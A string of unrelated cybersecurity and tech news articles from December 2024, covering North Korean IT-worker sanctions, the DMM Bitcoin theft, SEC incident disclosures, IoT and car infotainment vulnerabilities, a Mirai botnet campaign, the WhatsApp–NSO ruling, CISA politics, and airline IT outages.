The South Korean government has sanctioned more than a dozen individuals and one organization for a wide-ranging global scheme to fund North Korea’s nuclear and missile programs through impersonating IT workers abroad, stealing cryptocurrency and facilitating cyberattacks.

South Korean officials on Thursday identified 15 North Korean nationals and the Chosun Geumjeong Economic Information Technology Exchange Corporation for economic sanctions. The individuals are allegedly working for North Korea’s 313^th General Bureau, part of the DPRK’s Ministry of Munitions Industry, which oversees Pyongyang’s weapons production, research and development and ballistic missile programs.

The individuals and others “are known to be dispatched to China, Russia, Southeast Asia, Africa, and other countries as employees of regime-affiliated organizations such as the Ministry of Defense, disguising their identities and receiving work from IT companies around the world, while some are also known to be involved in information theft and cyberattacks,” according to a machine-translated press release from South Korea’s Peninsula Policy Bureau.

The Chosun Geumjeong Economic Information Technology Exchange Corporation is described as a company that “dispatches many North Korean IT personnel overseas and pays a large amount of military funds to the North Korean regime,” according to the release.

North Koreans posing as IT workers to gain employment at Western firms — bypassing work restrictions and earning revenue for their home government — has become a frequent occurrence in recent years. The growing trend has increasingly alarmed U.S. and Western national security officials, as well as company executives who have publicly come forward with their experiences after being duped.

Beyond just earning a paycheck, placing North Korean operatives in technical roles at Western firms can also make it easier to carry out hacking operations and cryptocurrency theft. In some cases, these workers have installed malicious software on company devices, stolen hundreds of thousands of dollars from companies and attempted to gain access to sensitive software building environments. Some executives suggest the issue is likely worse than the public understands, as the stigma of hiring a fraudulent employee still pushes companies to keep quiet.

South Korea also accused its northern neighbor of playing an outsized role in global cryptocurrency theft. A 2024 report by a United Nations panel stated that it is investigating at least 58 cyberattacks by DPRK operatives against cryptocurrency companies between 2017 and 2023, with the incidents yielding an estimated $3 billion in stolen gains. The panel also investigated “reports of numerous Democratic People’s Republic of Korea nationals working overseas earning income in violation of sanctions, including in the information technology, restaurant and construction sectors.”

In addition to threatening the overall cyber ecosystem, South Korea said the actions pose “a serious threat to international peace and security in that it is being used to fund North Korea’s nuclear and missile development.”

The new cybersecurity disclosure rules introduced by the US Securities and Exchange Commission (SEC) last year have resulted in a significant increase of incident reports from public companies, but most of the reports do not include the material impact of those incidents, according to a law firm specializing in finance and M&A activity.

Analysis by Paul Hastings LLP found cybersecurity incident reports have increased by 60% since the disclosure rule went into effect in 2023. The SEC regulation requires public companies to disclose material cybersecurity incidents within four business days of determining materiality. Material, in this instance, means that the incident can impact someone’s decision on whether to invest in the company. Determining materiality involves considering the immediate fallout and any longer-term effects on a company’s operations, customer relationships, financial impact, reputational or brand perception, and the potential for litigation or regulatory action.

As the chart above shows, the impact of the regulation spans numerous industries. While the financial services sector accounted for the largest number of disclosure reports, industrials and healthcare were also heavily impacted. Automotive retail and retail entities were also hit by cyberattacks and had to report those incidents.

Less than 10% of the disclosures detailed the material impacts of the incidents, suggesting that companies are having difficulty balancing detailed reporting with protecting the details of internal operations. The report included examples of what was considered material, such as Basset Furniture Industries noting that business operations are materially impacted until recovery efforts are completed, or First American Financial disclosing adjusted earning per share for the fourth quarter financial results and quantifying the losses in the company’s SEC filings.

Some companies (13%) opted to provide a press release or a reference to a blog post to provide more details about the incident.

Third-Party Breach Impact

One in four incidents in the report were third-party breaches. Companies are struggling to figure out whether to disclose third-party breaches, especially if other victims have disclosed the incidents. The automotive retail sector was affected primarily by the ransomware attack on automotive software provider CDK Global in June. The company paid a $25 million ransom. CDK’s parent company, Brookfield Business Partners, said in its July disclosure that the company did not “expect this incident to have a material impact.” Many of the smaller automotive companies claimed material impact as a result of CDK’s incident.

The SEC recently announced enforcement settlements with four SolarWinds customers for allegedly making misleading disclosures related to how they were impacted by the cyberattack. Two of the four publicly disclosed the incidents but did not disclose all material facts known at the time, such as the name of the threat actor, nature of information stolen, and number of accounts accessed. The other two did not disclose the incidents, and the SEC said they should have disclosed the impact.

Speed or More Details?

More than three-quarters (78%) of disclosures were made within eight days of discovery of the incident. The SEC specified that the deadline to disclose is not four business days after discovering the incident but rather when materiality has been determined, but most companies opted to act quickly. A third (32%) filed within four days of discovery. This suggests that companies are reporting quickly to avoid being fined by the SEC for delayed disclosure but too quickly because they have not yet determined the full implications of the incident. This may be why 42% of the companies wound up filing multiple reports for the same incident, each time providing more details, such as quantifiable loss, impact to customer personal data, and notification to individuals and regulators.

“Companies should continue to evaluate disclosure controls and engage in tabletop exercises to practice the decision-making required to makes such materiality decisions in the event of a cyber incident,” the report’s authors said.

Microsoft is warning of an issue when using a media support to install Windows 11, version 24H2, that causes the operating system to not accept further security updates.

The problem occurs when using CD and USB flash drives to install Windows 11 version with security updates released between October 8 and November 12.

“When using media to install Windows 11, version 24H2, the device might remain in a state where it cannot accept further Windows security updates,” Microsoft is warning.

“This occurs only when the media is created to include the October 2024, or November 2024, security updates as part of the installation,” the company explains.

The bug does not impact security updates applied via Windows Update or the Microsoft Update Catalog website and does not occur when the latest December 2024 security update is used.

Microsoft is currently working on a permanent fix and recommends that media-based Windows 11 24H2 installations use the December 2024 security update, released on December 10, to avoid encountering subsequent updating problems.

Windows 11 24H2 issues

The installation media issue is added to a long string of problems that impacts 24H2, the latest major feature update for Microsoft’s operating system, which was released earlier this year to offer enhanced security, usability, and performance.

Previously, Windows 11 24H2 users were impacted by audio problems on Dirac devices or USB DAC sound systems, Outlook launch issues when using outdated Google Workspace Sync, Auto HDR causing game freezes and incorrect colors, and functional problems with USB scanners supporting the eSCL protocol.

Notably, the major Windows update caused performance problems, crashes, freezes, and audio glitches on a number of Ubisoft games, including popular titles like Assassin’s Creed, Star Wars Outlaws, and Avatar: Frontiers of Pandora.

The Windows 11 24H2 update was even temporarily blocked on specific ASUS hardware and various other software/hardware configurations that caused problems.

Dec 25, 2024Ravie LakshmananCloud Security / Vulnerability

Cybersecurity researchers have discovered several security flaws in the cloud management platform developed by Ruijie Networks that could permit an attacker to take control of the network appliances.

“These vulnerabilities affect both the Reyee platform, as well as Reyee OS network devices,” Claroty researchers Noam Moshe and Tomer Goldschmidt said in a recent analysis. “The vulnerabilities, if exploited, could allow a malicious attacker to execute code on any cloud-enabled device, giving them the ability to control tens of thousands of devices.”

The operational technology (OT) security company, which carried out in-depth research of the Internet of Things (IoT) vendor, said it not only identified 10 flaws but also devised an attack called “Open Sesame” that can be used to hack into an access point in close physical proximity over the cloud and gain unauthorized access to its network.

Of the 10 vulnerabilities, three of them are rated Critical in severity –

• CVE-2024-47547 (CVSS score of 9.4) – Use of a weak password recovery mechanism that leaves the authentication mechanism vulnerable to brute force attacks
• CVE-2024-48874 (CVSS score of 9.8) – A server-side request forgery (SSRF) vulnerability that could be exploited to access internal services used by Ruijie and their internal cloud infrastructure via AWS cloud metadata services
• CVE-2024-52324 (CVSS score: 9.8) – Use of an inherently dangerous function that could allow an attacker to send a malicious MQTT message which could result in devices executing arbitrary operating system commands

Claroty’s research also found that it’s easy to break MQTT authentication by simply knowing the device’s serial number (CVE-2024-45722, CVSS score: 7.5), subsequently exploiting the access to Ruijie’s MQTT broker in order to receive a full list of all cloud-connected devices’ serial numbers.

“Using the leaked serial numbers, we could generate valid authentication credentials for all cloud-connected devices,” the researchers said. “This meant that we could perform a wide range of denial-of-service attacks, including disconnecting devices by authenticating on their behalf, and even sending fabricated messages and events to the cloud; sending false data to users of these devices.”

The knowledge of the device serial number could further be weaponized to access all MQTT message queues and issue malicious commands that would then get executed on all cloud connected devices (CVE-2024-52324).

That’s not all. An attacker who is physically adjacent to a Wi-Fi network that uses Ruijie access points could also extract the device’s serial number by intercepting the raw Wi-Fi beacons, and then leverage the other vulnerabilities in MQTT communication to achieve remote code execution. The Open Sesame attack has been assigned the CVE identifier CVE-2024-47146 (CVSS score: 7.5).

Following responsible disclosure, all the identified shortcomings have been fixed by the Chinese company in the cloud and no user action is required. About 50,000 cloud connected devices are estimated to have been potentially impacted by these bugs.

“This is another example of weaknesses in so-called internet-of-things devices such as wireless access points, routers, and other connected things that have a fairly low barrier to entry on to the device, yet enable much deeper network attacks,” the researchers said.

The disclosure comes as security form PCAutomotive flagged 12 vulnerabilities in the MIB3 infotainment unit used in certain Skoda cars that malicious actors could chain together to achieve code execution, track the cars’ location in real-time, record conversations via the in-car microphone, take screenshots of the infotainment display, and even exfiltrate contact information.

The flaws (from CVE-2023-28902 through CVE-2023-29113) permit attackers to “gain code execution on the MIB3 infotainment unit over Bluetooth, elevate privileges to root, bypass secure boot to gain persistent code execution, and control infotainment unit via DNS channel every time the car starts,” PCAutomotive researchers said.

The discovery adds to nine other flaws (from CVE-2023-28895 through CVE-2023-28901) identified in the MIB3 infotainment unit in late 2022 that could allow attackers to trigger a denial-of-service, bypass UDS authentication, and obtain vehicle data — namely, mileage, recent trip duration, and average and max.=imum speed of the trip — by knowing only VIN number of a vehicle.

Video In 2018, Rob Joyce, then Donald Trump’s White House Cybersecurity Coordinator, gave a surprise talk at the legendary hacking conference Shmoocon about his hobby.

As the former head of the NSA’s Tailored Access Operations squad – the people who crack systems and gather intelligence for the US government – Joyce was also the friendly public face of the agency. The agency didn’t come out of the Edward Snowden affair with a great reputation when the ex-NSA contractor-turned-whistleblower made public the existence of the NSA data collection programs back in June 2013. Many in the security industry were peeved at the agency’s disregard for privacy and the accepted norms under which people assumed it operated.

Joyce was part of a campaign to make the NSA acceptable again, and he was doing a good job. We covered his talk at the first Enigma security conference, and it was unusually frank – most talks by agency personnel are about as exciting as watching paint dry.

But the Shmoocon talk (see below) was a personal matter. It turns out Joyce is a big fan of Christmas, and of hacking the seasonal strings of lights that hang off so many American houses during the holiday season. As you can see from the video below, he’s serious about it and applies all the rigor normally used to break into adversaries’ networks to put on a show.

Youtube Video

Next year, at the last Shmoocon, Joyce will reprise his talk and offer updates on how to turn your house into a light show that will either delight, or irritate, the neighbors. He spoke to The Register ahead of time to explain the hobby.

The Register: The first and most obvious question: why? What got you into this?

Joyce: We had a family tradition where we drove around looking at Christmas lights on Christmas Eve with the kids. And we passed a house only a few miles from us that had computer-controlled LEDs synchronized to music and a little radio station you tuned to. And it just captivated me.

It was not elegant, right? It was over the top and gaudy, and just really made me happy. I said “I think I could do that,” meaning I have the technical chops to achieve it. And [Joyce’s wife] said, “yes you can,” and I took that as license to mean, “yes, you can do it.” And so when boxes started arriving in the mail in February and March, she’s like, “what the hell is this?”

The Register: In terms of work time, how long does a setup like this take?

Joyce: The startup was enormous if you’ve seen the images. I could cover the house and put things in the yard, and there are a bunch of different props that are created. If I knew how much work it was I would not have started.

But now the incremental work is not so bad. It takes me about three and a half days to get things set up. I hope for a weather window, and the first day I start is somewhere right before Thanksgiving because the first thing I do is the very top of the roof, up on the outside of the house. The second day is the next layer of things on the house, and then after that, if we have bad weather, I can do things on the ground and around the yard without much concern – but I don’t want to be on the roof in bad weather and wind.

Youtube Video

The Register: A senior person in the NSA ordering huge amounts of electronic equipment from China didn’t set off any red flags?

Joyce: None of the compute comes from China, just the LED strings themselves. I would applaud somebody if they could supply chain that.

I do take a little more care in the control system itself. It’s not connected to the internet and is a standalone network – because I do have friends who have interesting hobbies and would love to change my display and make it say some interesting things.

The Register: You’ve said that the things that impress many people aren’t the lights themselves but the radio station that synchronizes with them. How’s that set up?

Joyce: It’s probably on the hairy edge of what the FCC would approve, but I make sure it’s not interfering with anything in the neighborhood. It’s probably the least technical part of the whole creation. You plug an audio signal in and it just spits it out as a radio channel. I did custom make the antenna to make sure that there’s good reception.

The Register: What about the software, do you code it yourself?

Joyce: I don’t write the software. I use an open source product called xLights that will let you map the songs to your display. And there’s a group of people out there who write that software and improve it constantly. I’m very grateful to them and donate to their project every year to help keep them going. But much like me, they do it as a labor of love.

Then there’s some software that runs on Raspberry Pis that controls the flat panel displays that are hung on the outside of the house, and also pipes all the pixel commands in real time out to all the lights across the whole show. That also is open source and part of this hobbyist community.

The Register: Is the Christmas lights hobbyist community that large?

Joyce: Well, every year xLights put out a song and they put out the light sequence to it, and then all these people map them to their display and record their house. Then they cut together a video of all of these different houses doing the same song. And there’s thousands of people that do that. It got so big. I did it for a couple of years, but I stopped doing it just because it’s so big.

The Register: Are you still using the same controller board?

Joyce: No, they’re out in the cold, and they get a lot of thermal cycling. That makes them a little flaky. The technology has advanced now. Now it’s all surface mount technology, and they include better debugging to help you figure out where your issues are. And there’s a Raspberry Pi as the main controller.

The Register: And for connections – wired or wireless?

Joyce: I still do Ethernet. You know, wireless introduces delays and I worry about interference and the signal. Also I still don’t want the mischievous friends coming over and messing with my wireless. They can roll up with a cable of Ethernet and jack into the local network there, but the security cameras outside would spot them.

Youtube Video

The Register: What do the neighbors think of all this?

Joyce: I’m trying to keep my neighbors reasonably happy. They all enjoy the light show to an extent, but these days they can’t get in their driveway because the traffic is backed up. You know, that makes for unhappy neighbors. I had one family and was getting the vibes that they weren’t that crazy about it, but they’ve had children and the grandchildren love it, and I think it reminded them of the joy it brings to other visitors.

When there are low lying clouds, you can be a mile away from the house and you’ll see the clouds change color, so it’s always going to be nice thinking, “Yeah, I did that.”

The Register: What advice would you give to people that want to get into this?

Joyce: Have an understanding partner.

Seriously, go to the xLights website. There’s a forum there that will link you to the YouTube community. There are great tutorials on YouTube, and there’s a bunch of very active Facebook groups, and on the xLights site you’ll find something people refer to as the xLights Zoom Room. It’s a group of people who volunteer their time and they sit on Zoom calls and help people work through the technical issues they have.

The Register: Can you give us a rough idea of what the setup on something like this would cost?

Joyce: Oh no, I’m from NSA. I know how to keep a secret.

Joyce also has a Twitter account devoted to his hobby. For security (and traffic) reasons, we won’t be publishing his physical address. ®

A federal judge has dealt the first major legal blow against spyware maker NSO Group, ruling in favor of WhatsApp in a five-year-old lawsuit against the Israeli firm over allegations that it hacked the chat service.

Northern California District Court Judge Phyllis Hamilton made her ruling on Friday as a summary judgment, thus not requiring a full trial. She determined that NSO Group violated U.S. and California anti-hacking laws and had failed to obey court orders to produce evidence, especially the Pegasus spyware source code.

It’s the biggest turn in a case that at one point compelled the Supreme Court to weigh in and that has produced a bevy of revelations, and is perhaps the biggest ruling to date against a spyware maker in what is a difficult forum for victims.

“This is a historic judgment and a first major court victory against NSO Group in the world, finding them liable for compromising the digital security infrastructure that millions of people rely on,” said Natalia Krapiva, senior tech-legal counsel at the Access Now digital rights group. “While the trial will continue on how much damages NSO should pay, the partial summary judgment is a major win for WhatsApp, civil society, and Pegasus victims around the world.”

Officials at Meta, the parent company at WhatsApp, also celebrated the ruling.

“This ruling is a huge win for privacy,” Will Cathcart, head of WhatsApp, said on Threads. “We spent five years presenting our case because we firmly believe that spyware companies could not hide behind immunity or avoid accountability for their unlawful actions. Surveillance companies should be on notice that illegal spying will not be tolerated.”

Added Meta CEO Mark Zuckerberg: “Proud that we fought for this and that WhatsApp continues to lead on privacy and encryption 💪”

A spokesperson for NSO Group said the company had no comment at this time.

WhatsApp accused NSO Group of sending malware to infect around 1,400 mobile phones and devices. NSO Group contended, in part, that the plaintiffs lacked personal jurisdiction to bring the suit, citing other cases that had been dismissed.

“The key distinction in all of those cases appears to be the citizenship/residency of the plaintiffs,” Hamilton wrote. “In this case, defendants do not dispute that plaintiffs are citizens of the United States and residents of this district, making the cited cases inapposite.”

Krapiva said the ruling should force other spyware companies to “take notice. The wheels of justice are slow, but the period of impunity for spyware purveyors and abusers is winding down.”

Before it was subsumed by political commentary, the Cybersecurity and Infrastructure Security Agency (CISA) was a Trump accomplishment — signed into existence in 2018 during his first administration. But that was before accusations of dirty politics and free speech shenanigans turned CISA into a conservative pariah.

Now, CISA is facing an existential political clash with the incoming Trump administration, threatening to take much of the US federal government’s involvement in cybersecurity along with it. The result could potentially increase cyber-risk, but also open up business, investment, and innovation opportunities. A lot of things can be true at once.

CISA’s original mandate couldn’t have seemed more apolitical: coordinate defending US infrastructure against cyberattacks, and then help share critical information among US enterprises to increase the nation’s overall posture in the bargain. But then came the 2020 election, CISA’s efforts to combat what the agency deemed “misinformation,” and the subsequent conservative backlash.

Trump and the Politics of CISA

Chis Krebs, then the agency’s director, was very publicly fired just weeks after the 2020 election for rejecting claims of fraud from the Trump administration, and has remained a high-profile political player ever since. Krebs is a regular on the cable news circuit, and in July 2023, he confirmed to CNN that he was interviewed by special counsel Jack Smith in the investigation into Trump and the 2020 election. In the runup to the 2024 election, Krebs appeared on outlets including Face the Nation to once again push back on Trump campaign claims of election fraud.

His replacement, Jen Easterly, took a more low-key approach. Her accessibility, deep military ties, and cybersecurity expertise — sprinkled with a dash of aspirational cool-girl charm — made her a hit among the cyber rank-and-file. She also mostly stayed away from politics, leading the fledgling agency through a crucial four years. But that effort, however disciplined and well intentioned, hardly spared Easterly or CISA from widespread conservative ire. In January 2024, Easterly was even targeted at home in a swatting incident.

“I think Jen Easterly had a tremendous challenge solidifying the role of a very young agency, and one mired in allegations from Republican politicians,” cybersecurity expert Jake Williams tells Dark Reading. “Given those very real challenges, she did an outstanding job. I can only imagine what could have been with bipartisan support for CISA’s many missions.”

Following the 2024 election, Easterly said she will resign on Inauguration Day. But the agency is still at work, publishing a draft of an updated National Cyber Incident Response Plan for federal agencies and industry to work together during major cyber events, which is open for comments until January 2025.

That kind of coordination between CISA and the private sector was exactly what the agency was built to become under the Biden administration. It took a proactive role in developing cybersecurity standards, and offering cybersecurity grants to states to invest in their own cyber operations, led largely by the efforts of Easterly. During his administration, President Biden allocated billions to strengthen the US cybersecurity infrastructure, and signed a flurry of executive orders on everything from AI to zero trust in an effort to raise the country’s level of cyber preparedness.

Some of the agency’s notable accomplishments during the past four years included establishment of the joint cyber defense collaborative (JCDC) and the Known Exploited Vulnerabilities (KEV) program, according to Casey Ellis, Bugcrowd founder. Ellis also worked with CISA on the federal CEB vulnerability disclosure program, where CISA serves as a repository for researchers who discover flaws in government systems so they can be reported and mitigated more quickly.

There have been setbacks as well. While the KEV list has been credited with speeding up remediation, it can take months to make the list. Much of that new cyber infrastructure and rulemaking also came with regulation and compliance headaches that some criticized as a barrier to innovation, particularly by Congress. Others defended the agency’s moves as necessary to drive security investment.

“Under Jen Easterly, CISA’s proactive initiatives such as Secure by Design and faster reporting of attacks by companies were positive for both the sell and buy side of the cybersecurity industry,” says Jason Soroko, senior fellow at Sectigo. “What could be seen as regulatory burden was actually a positive call to arms to do the right thing.”

Accomplishments and accolades aside, Easterly and CISA haven’t been able to convince key conservatives like Sen. Rand Paul, who is about to chair the Senate Homeland Security and Governmental Affairs Committee, which oversees CISA, that the agency is doing any good. After acknowledging he probably won’t be able to eliminate CISA altogether, last month Paul vowed to inflict strict limits for actions he said the agency took to target conservative voices as part of its work in combatting foreign influence operations. At a minimum, CISA will likely be stripped of its mandate to investigate misinformation.

Williams also expects the agency will have a diminished role in overseeing election security, the very issue that catapulted the cyber agency into the national headlines in 2020.

Cybersecurity Opportunities Under Trump 2.0

A shrinking CISA footprint and the Trump administration’s expressed distaste for regulation and interest in opening government operations to more public-private partnerships mean there are going to be potential opportunities in the next few months for the private sector that hadn’t existed before.

“I expect we’ll see a more direct set of conversations around cyber offense and deterrence, especially as it relates to countering Russia, Iran, and in particular, China,” Ellis predicts. “This could include changes to the structure of [the National Security Agency] and Cyber Command, and the inclusion of the private sector in defend-forward and disruption operations.”

Beyond new opportunities to work with government, Ellis adds cybersecurity deregulation is on the way.

“In general, I think we can expect a more overt and domestically deregulated approach to cyberspace, reflecting the general policy approach of the Trump administration and a more open acknowledgement that Cold War 2 is already underway.”

The new administration also likely signals a change in federal enforcement of Securities and Exchange Commission (SEC) regulations against chief information security officers (CISOs), like what security executives from SolarWinds and Uber experienced, according to expert John Bambenek.

“Regulatory enforcement on companies will lessen, for instance, [and] it is doubtful CISOs will see any government attempts to make them liable for breaches,” Bambenek says. “I’m not sure any more antitrust action will commence against large tech companies either, which will fuel further consolidation of technology and security companies.”

There is cautious optimism this more hands-off approach from the Trump administration will include maintaining a basic role for the federal government in cybersecurity. It’s particularly necessary in terms of resources, according to Roselle Safran, the director of the White Office of the President security operations center under Barack Obama, and currently president of cybersecurity company KeyCaliber.

“While there are certainly plenty of other issues that appear to be top priorities for the next administration, it is my hope that cybersecurity will not be relegated to the back burner,” Safran says. “It’s important that there is recognition that cybersecurity needs significant and sustained resources.”

Trump takes office against the backdrop of unprecedented numbers of cyberattacks, the rise of artificial intelligence, and cyber-military conflicts across the globe. Keeping politics out of the conversation is the best way for CISA to continue its work beyond the next election, experts advise. However, that might be an impossible challenge.

“I’m concerned about some of the negative sentiment around CISA impacting progress that has been made since 2018,” Ellis adds. “However, I am cautiously optimistic that the priorities Trump had in mind when he formed the agency will see its overall defensive mission carry forward.”

A new Mirai-based botnetis actively exploiting a remote code execution vulnerability that has not received a tracker number and appears to be unpatched in DigiEver DS-2105 Pro NVRs.

The campaign started in October and targets multiple network video recorders and TP-Link routers with outdated firmware.

One of the vulnerabilities used in the campaign was documented by TXOne researcher Ta-Lun Yen and presented last year at the DefCamp security conference in Bucharest, Romania. The researcher said at the time that the issue affects multiple DVR devices.

Akamai researchers observed that the botnet started to exploit the flaw in mid-November, but found evidence that the campaign has been active since at least September.

Apart from the DigiEver flaw, the new Mirai malware variant also targets CVE-2023-1389 on TP-Link devices and CVE-2018-17532 on Teltonika RUT9XX routers.

Attacks on DigiEver NVRs

The vulnerability exploited to compromise DigiEver NVRs is a remote code execution (RCE) flaw and the hackers are targeting the ‘/cgi-bin/cgi_main. cgi’ URI, which improperly validates user inputs.

This allows remote unauthenticated attackers to inject commands like ‘curl’ and ‘chmod’ via certain parameters, such as the ntp field in HTTP POST requests.

Akamai says that the attacks it has seen by this Mirai-based botnet appear similar to what is described in Ta-Lun Yen’s presentation.

Through command injection, the attackers fetch the malware binary from an external server and enlist the device into its botnet. Persistence is achieved by adding cron jobs.

Once the device is compromised, it is then used to conduct distributed denial of service (DDoS) attacks or to spread to other devices by leveraging exploit sets and credential lists.

Akamai says the new Mirai variant is notable for its use of XOR and ChaCha20 encryption and its targeting of a broad range of system architectures, including x86, ARM, and MIPS.

“Although employing complex decryption methods isn’t new, it suggests evolving tactics, techniques, and procedures among Mirai-based botnet operators,” comments Akamai.

“This is mostly notable because many Mirai-based botnets still depend on the original string obfuscation logic from recycled code that was included in the original Mirai malware source code release,” the researchers say.

The researchers note that the botnet also exploits CVE-2018-17532, a vulnerability in Teltonika RUT9XX routers as well as CVE-2023-1389, which impacts TP-Link devices.

Indicators of compromise (IoC) associated with the campaign are available at the end of Akamai’s report, along with Yara rules for detecting and blocking the threat.

Dec 24, 2024Ravie LakshmananCybercrime / Malware

Japanese and U.S. authorities have formerly attributed the theft of cryptocurrency worth $308 million from cryptocurrency company DMM Bitcoin in May 2024 to North Korean cyber actors.

“The theft is affiliated with TraderTraitor threat activity, which is also tracked as Jade Sleet, UNC4899, and Slow Pisces,” the agencies said. “TraderTraitor activity is often characterized by targeted social engineering directed at multiple employees of the same company simultaneously.”

The alert comes courtesy of the U.S. Federal Bureau of Investigation (FBI), the Department of Defense Cyber Crime Center, and the National Police Agency of Japan. It’s worth noting that DMM Bitcoin shut down its operations earlier this month in the aftermath of the hack.

TraderTraitor refers to a North Korea-linked persistent threat activity cluster that has a history of targeting companies in the Web3 sector, luring victims into downloading malware-laced cryptocurrency apps and ultimately facilitating theft. It’s known to be active since at least 2020.

In recent years, the hacking crew has orchestrated a series of attacks that leverage job-themed social engineering campaigns or reaching out to prospective targets under the pretext of collaborating on a GitHub project, which then leads to the deployment of malicious npm packages.

The group, however, is perhaps best known for infiltrating and gaining unauthorized access to JumpCloud’s systems to target a small set of downstream customers last year.

The attack chain documented by the FBI is no different in that the threat actors contacted an employee at a Japan-based cryptocurrency wallet software company named Ginco in March 2024, posing as a recruiter and sending them a URL to a malicious Python script hosted on GitHub as part of a supposed pre-employment test.

The victim, who had access to Ginco’s wallet management system, was subsequently compromised after they copied the Python code to their personal GitHub page.

The adversary moved to the next-phase of the attack in mid-May 2024 when it exploited session cookie information to impersonate the compromised employee and successfully gained access to Ginco’s unencrypted communications system.

“In late-May 2024, the actors likely used this access to manipulate a legitimate transaction request by a DMM employee, resulting in the loss of 4,502.9 BTC, worth $308 million at the time of the attack,” the agencies said. “The stolen funds ultimately moved to TraderTraitor-controlled wallets.”

The disclosure comes shortly after Chainalysis attributed the hack of DMM Bitcoin to North Korean threat actors, stating the attackers targeted vulnerabilities in infrastructure to make unauthorized withdrawals.

“The attacker moved millions of dollars’ worth of crypto from DMM Bitcoin to several intermediary addresses before eventually reaching a Bitcoin CoinJoin Mixing Service,” the blockchain intelligence firm said.

“After successfully mixing the stolen funds using the Bitcoin CoinJoin Mixing Service, the attackers moved a portion of the funds through a number of bridging services, and finally to HuiOne Guarantee, an online marketplace tied to the Cambodian conglomerate, HuiOne Group, which was previously exposed as a significant player in facilitating cybercrimes.”

The development also comes as the AhnLab Security Intelligence Center (ASEC) revealed that the North Korean threat actor codenamed Andariel, a sub-cluster within the Lazarus Group, is deploying the SmallTiger backdoor as part of attacks targeting South Korean asset management and document centralization solutions.

A technical snafu briefly grounded American Airlines flights across the US on Christmas Eve.

American Airlines tells The Register that the technology issue impacted systems necessary for flight releases. In response, the FAA reports that the airline requested a nationwide stop order, which began around 1150 UTC and lasted about an hour.

In a statement, the US’ largest airline blamed a “vendor technology” issue for the disruption, but didn’t name and shame any specific provider.

“That issue has been resolved and flights have resumed. We sincerely apologize to our customers for the inconvenience this morning. It’s all hands on deck as our team is working diligently to get customers where they need to go as quickly as possible,” an American Airlines spokesperson told The Register in an email.

American Airlines didn’t address El Reg’s questions as to whether resolving the issue could result in additional delays or disruptions over the holiday season.

The airline is encouraging customers to use their mobile app or visit their website for information on how the outage may have affected their flights and connections.

The incident comes amid one of the busiest travel seasons of the year, with the Transportation Security Administration (TSA) expecting to screen nearly 40 million passengers over the peak Christmas and New Year’s travel period.

As technology relayed travel disruptions go, an hour-long grounding is far from the worst. Over the past few years, we’ve seen numerous situations in which IT failures have left millions stranded. Two years ago, an IT meltdown at Southwest Airlines left roughly 2 million travelers stranded as crews were forced to schedule flights manually in what was later described as an “extraordinarily difficult” and “tedious, long process.”

More recently, the now infamous Crowdstrike outage brought much of the IT world to a standstill. It is estimated the flawed update to the Falcon thread-detection system crashed and disabled more than 8 million Microsoft Windows machines around the world. Among them were more than 37,000 systems operated by Delta Airlines. The incident resulted in travel delays for more than 1.3 million people, the airline later revealed. ®